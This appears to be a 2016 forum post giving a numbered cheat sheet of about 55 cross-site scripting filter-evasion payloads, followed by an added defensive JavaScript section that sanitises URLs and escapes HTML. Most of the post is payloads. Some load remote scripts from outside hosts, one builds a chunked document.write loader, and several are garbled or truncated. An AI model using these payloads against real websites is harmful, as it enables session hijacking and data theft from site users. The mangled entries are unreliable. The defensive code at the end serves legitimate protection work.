XSS Attack Summary

Posted on 2016-4-28 10:06:15
(1) Ordinary XSS JavaScript injection

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative alert boxes

<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using a JavaScript command

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag without semicolon or quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolon required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>

(11) Embedded tab splitting the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab splitting the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Multi-line embedded JavaScript injection, an extreme XSS example
<IMG SRC=\'#\'" /span>

(16) Working around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2. Null characters are basically useless domestically, since there is nowhere to exploit them.
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=\'#\'"   javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double opening brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double opening angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escape-filtered JavaScript
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC=\'#\'" /span>

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META with URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (made of an opening angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
expression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>
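Most of the IMG/LINK/BODY entries above (items 3 to 19) get past a naive "does it contain javascript:" filter through case changes, HTML entity encoding with or without semicolons, and embedded tab, newline, carriage-return or NUL characters. The defensive counterpart, added here as an example that is not part of the original post, is to canonicalise the value the way the browser will before checking it and then allow only http(s); the function names `decodeEntities`, `safeUrl`, `escapeHtml` and the base origin `https://example.invalid/` are assumptions of this example.

```javascript
// Added defensive example (not from the original post). Before a user-supplied
// value is written into a src/href attribute, canonicalise it the way a browser
// would and allow only http(s). Each step corresponds to an evasion in the list
// above: case variation, HTML entity encoding (with or without ';'), and
// embedded tab/CR/LF/NUL characters. Function names here are hypothetical.

const NAMED_ENTITIES = { amp: "&", lt: "<", gt: ">", quot: '"', apos: "'",
                         tab: "\t", newline: "\n", nbsp: "\u00a0" };

// Decode numeric (&#106; &#x6A;) and a few named entities; the ';' is optional,
// which is exactly what items (9) and (10) rely on.
function decodeEntities(s) {
  return s.replace(/&(#x[0-9a-f]+|#\d+|[a-z]+);?/gi, (m, body) => {
    if (body[0] === "#") {
      const hex = body[1].toLowerCase() === "x";
      const code = hex ? parseInt(body.slice(2), 16) : parseInt(body.slice(1), 10);
      return Number.isFinite(code) && code <= 0x10ffff ? String.fromCodePoint(code) : m;
    }
    const named = NAMED_ENTITIES[body.toLowerCase()];
    return named !== undefined ? named : m;
  });
}

// Returns an absolute http(s) URL string, or null if the value must be rejected.
// BASE is a placeholder for the page's own origin.
const BASE = "https://example.invalid/";
function safeUrl(input) {
  // 1. Undo attribute-level entity encoding, as the HTML parser does before
  //    the URL parser ever sees the value.
  let s = decodeEntities(String(input));
  // 2. Drop C0 controls (tab, CR, LF, NUL) and surrounding whitespace, so that
  //    "jav\tascript:" or "java\0script:" cannot slip past the scheme check.
  s = s.replace(/[\u0000-\u001f\u007f]/g, "").trim();
  let url;
  try { url = new URL(s, BASE); } catch { return null; }
  // 3. Allowlist the scheme. URL() lower-cases it, so "JaVaScRiPt:" is caught;
  //    "javascript:", "vbscript:" and "data:" are all rejected here.
  if (url.protocol !== "http:" && url.protocol !== "https:") return null;
  return url.href;
}

// Encode a value for insertion into HTML text or a quoted attribute, so that a
// payload such as <SCRIPT>alert("XSS")</SCRIPT> is rendered as literal text.
function escapeHtml(s) {
  return String(s).replace(/[&<>"'`]/g, c => "&#" + c.charCodeAt(0) + ";");
}
```

Note that a scheme allowlist still accepts protocol-relative values such as `//3w.org/XSS/xss.js`; if only your own origin may be referenced, compare `url.origin` as well.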